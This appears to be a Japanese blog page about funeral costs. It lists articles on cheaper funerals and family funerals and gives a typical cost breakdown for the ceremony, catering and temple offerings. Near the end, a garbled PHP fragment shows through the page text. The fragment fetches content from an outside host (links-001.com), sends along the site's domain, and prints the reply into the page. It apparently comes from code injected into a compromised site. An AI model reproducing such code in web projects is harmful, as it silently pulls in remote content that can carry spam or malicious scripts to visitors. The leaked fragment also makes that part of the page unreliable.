前へ
次へ

葬儀の費用を安くするために利用した方法

葬儀に関する費用を安く抑えようとするためには、次のような方法を利用することがおすすめです。

more

急な葬式でバタバタと焦りました

先日葬式に参列してきました。
祖母が亡くなったのですが、今は離れている場所で暮らしているため故

more

家族葬にはどんなメリットとデメリットがあるのか

最近、よく選ばれている葬儀スタイルに家族葬と呼ばれるものがあります。
家族葬というのは、文字通

more

お葬式を行うために必要な一般的な葬儀費用の内訳

お葬式を行おうと葬儀社に見積もりを取った場合、一般的に次のような葬儀費用の内訳を提示されます。
まずは葬儀一式の費用です。
具体的には病院や自宅からの遺体の搬送や通夜、告別式、火葬を行うために必要な物品代、人件費などが含まれています。
一般的なお葬式のケースでは大体120~130万円程度の金額が相場です。
次に飲食接待に係る費用です。
これは通夜から葬儀にかけて参列者に振る舞われる食事代や対応するスタッフの人件費などです。
参列する人数が多くなるほど高くなっていきます。
一般的な飲食接待にかかる費用は約30万円が相場です。
最後に寺院関係の費用です。
一般的な形式での葬儀を行う場合には付き合いのある寺院の僧侶に読経を依頼することになります。
寺院関係の費用は読経をしてもらったお礼として僧侶に渡すお布施の額になります。
およその相場は47万円程度とされていますが、地域や依頼する寺院などによって幅があることが普通なので、あくまで目安として把握しておく方が良いでしょう。
これらが葬儀費用の大まかな内訳になります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top